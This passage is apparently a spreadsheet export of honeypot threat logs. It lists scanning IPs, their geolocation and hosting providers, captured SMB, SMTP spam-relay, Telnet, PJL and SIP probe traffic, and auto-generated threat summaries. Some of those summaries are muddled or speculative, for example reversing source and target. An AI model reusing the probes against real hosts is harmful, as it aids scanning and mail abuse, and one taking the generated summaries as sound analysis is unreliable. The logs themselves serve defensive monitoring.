(103.168.159.158,57798)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57871)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57970)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58115)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58189)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58289)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58357)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58468)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58549)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58752)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58830)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53479)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53967)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50848)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,51896)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52751)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53426)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53356)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53886)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53334)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53639)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52355)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52802)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58427)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50522)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50863)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50016)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50341)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,62391)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,63180)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a8:9f9e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="An incoming connection from an external IP address is made to a SMB service._x000a_This could be an attempt to access or exploit the SMB service on the monitored system._x000a_It may indicate unauthorized access or malicious activity targeting the SMB service. &amp;&amp; Possible malicious activity is an incoming SMB connection from an unknown IP address attempting to access the system. This could be an attempt to exploit vulnerabilities in file sharing services or spread malware through the network. The source IP may be a remote attacker trying to gain unauthorized access. &amp;&amp; An incoming connection from an IP address (103.168.159.158) was made to the system for SMB sharing. This could be a suspicious attempt to gain unauthorized access or transfer files. The source IP may be trying to exploit vulnerabilities in the service. &amp;&amp; Incoming SMB connection from a suspicious IP address (103.168.159.158) to an open SMB share, potentially attempting unauthorized access or data exfiltration._x000a_The remote IP is making an unexpected and possibly malicious connection to the SMB service._x000a_This could be a sign of a potential exploitation attempt or reconnaissance activity. &amp;&amp; An incoming SMB connection was detected from an IP address. This may indicate an attempt to access or exploit the system's file sharing service, which could be a malicious activity. The source IP is attempting to initiate communication with the targeted service. &amp;&amp; Incoming SMB connection from unknown IP address attempting to establish unauthorized access._x000a__x000a_This indicates a potential attempt by an attacker to exploit vulnerabilities or gain unauthorized access to resources on the network._x000a__x000a_It may be a reconnaissance activity or a prelude to more malicious actions such as data exfiltration. &amp;&amp; A remote device is attempting to establish an SMB connection to a server at IP address 103.168.159.158, potentially indicating a malicious port scanning or reconnaissance activity._x000a_The source IP is trying to initiate communication with the server._x000a_This could be a precursor to further exploitation or data transfer. &amp;&amp; An incoming connection from an unknown IP address suggests potential unauthorized access to the service. The IP address 103.168.159.158 may be trying to establish a malicious connection. This could be an attempt to exploit vulnerabilities in the system or steal sensitive data. &amp;&amp; An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources._x000a_This may indicate a scanning or reconnaissance attempt by a malicious entity._x000a_Further investigation is needed to confirm the intent behind this activity. &amp;&amp; An incoming SMB connection from an unknown IP address indicates a potential scanning or exploitation attempt._x000a_The IP address and port number suggest a possible brute-force attack or vulnerability scan._x000a_This activity may be indicative of malicious reconnaissance or exploitation attempts. &amp;&amp; An unknown IP address is attempting to establish a connection to a sensitive service on our system. This could be an initial step in a larger malicious operation or a reconnaissance attempt by an attacker. The use of a high port number suggests the attack may not be a traditional vulnerability exploit. &amp;&amp; An incoming SMB connection from an IP address (103.168.159.158) with a port of 63180 has been detected._x000a_This may indicate an attempt to exploit the system or access unauthorized files._x000a_Port 63180 is not a standard SMB port, which could be a sign of malicious activity."/>
    <s v="Port Scan &amp;&amp; SMB Scanning &amp;&amp; SMB Attack &amp;&amp; SMB Scanning &amp;&amp; SMB Scanning &amp;&amp; SMB Brute &amp;&amp; Port scan &amp;&amp; SMB Scanning &amp;&amp; Port Scanning &amp;&amp; SMB Portscan"/>
  </r>
  <r>
    <x v="89"/>
    <x v="89"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:11:14"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T18:11:14"/>
    <n v="481"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_DHCP_H6&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_DHCP_H32&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMTP_H18&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SMTP_H20"/>
    <s v="25&amp;&amp;53&amp;&amp;53748&amp;&amp;67&amp;&amp;10467&amp;&amp;67&amp;&amp;42568&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="142002"/>
    <s v="Scloud Pte Ltd"/>
    <s v="Scloud Pte Ltd"/>
    <s v="hosting"/>
    <s v="Scloud Pte Ltd"/>
    <s v="None"/>
    <s v="SCLOUDPTELTD-SG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 7 Feb 2025 00:25:42 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 9 Feb 2025 19:36:10 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 13 Feb 2025 12:41:53 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 19 Feb 2025 16:10:18 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '194.233.76.135_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 26 Feb 2025 13:43:21 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 27 Feb 2025 12:07:24 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 27 Feb 2025 18:21:32 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Feb 2025 16:56:07 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 8 Mar 2025 16:16:04 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 10 Mar 2025 17:30:51 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 12 Mar 2025 05:33:56 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 12 Mar 2025 19:17:14 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 19 Mar 2025 01:51:35 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 21 Mar 2025 17:09:21 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 30 Mar 2025 15:55:01 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 7 Apr 2025 14:49:03 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.8.69_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 10 Apr 2025 21:05:39 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 10 Apr 2025 21:14:30 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 13 Apr 2025 18:10:48 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:eb39"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <s v="The log suggests an attempt to reset the SMTP session, which could be a step in spamming or phishing campaigns._x000a_This action is typically followed by sending multiple emails or attempting to establish unauthorized connections. _x000a_It may indicate malicious intent to abuse email services. &amp;&amp; This log entry indicates that an attacker attempted to authenticate using the LOGIN command, likely attempting to steal credentials or gain unauthorized access to a mail account. The fact that it's using the AUTH command suggests a login attempt is being made. This could be a sign of a phishing or password cracking attack. &amp;&amp; Malicious activity detected - Attempt to establish unauthorized SMTP connection, possibly for spam or phishing purposes, which was then abruptly terminated upon reaching the server. The QUIT command indicates a sudden end to the session without proper completion of the communication process. This could be an indication of a reconnaissance probe or an initial step in a more sophisticated attack. &amp;&amp; No log data provided, unable to analyze or describe possible malicious activity. &amp;&amp; Malicious activity detected: suspicious SMTP command sent, attempting to reset state, potentially for spamming or phishing purposes. This could be a reconnaissance step by an attacker to prepare for further malicious activities. The RSET command is being used unusually in this context."/>
    <s v="Port Scan &amp;&amp; Password Hack &amp;&amp; Brute Force"/>
  </r>
  <r>
    <x v="90"/>
    <x v="90"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:11:05"/>
    <d v="2024-07-09T10:00:00"/>
    <d v="2025-04-30T18:11:05"/>
    <n v="51"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23&amp;&amp;22&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:6155"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="91"/>
    <x v="91"/>
    <s v="42-200-197-209.static.imsbiz.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:11:03"/>
    <d v="2024-12-03T20:36:53"/>
    <d v="2025-04-30T18:11:03"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NNO"/>
    <s v="North"/>
    <s v="NA"/>
    <s v="Kwu Tung"/>
    <s v="1819570"/>
    <s v="NA"/>
    <s v="22.4947"/>
    <s v="114.107"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="PCCW IMSBiz"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2ac8:c5d1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The log shows an attempt to access a telnet service, which is often used for malicious activities such as unauthorized access or reconnaissance. The fact that the activity type for this specific connection is listed as &quot;not available&quot; suggests the attackers may be trying to remain stealthy. This behavior could indicate an initial probing phase by malicious actors."/>
    <m/>
  </r>
  <r>
    <x v="92"/>
    <x v="92"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:10:55"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-30T18:10:55"/>
    <n v="330"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_HTTPS_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9100&amp;&amp;1433&amp;&amp;80&amp;&amp;23&amp;&amp;5432&amp;&amp;NA&amp;&amp;445&amp;&amp;110&amp;&amp;59680&amp;&amp;60004&amp;&amp;25&amp;&amp;443&amp;&amp;3389&amp;&amp;3306&amp;&amp;143&amp;&amp;21"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;query&amp;&amp;request&amp;&amp;login&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=10962'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=25036'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=63890'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.221,49984)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.209.6:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.171.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.221,27130)}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.234.67.80:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': 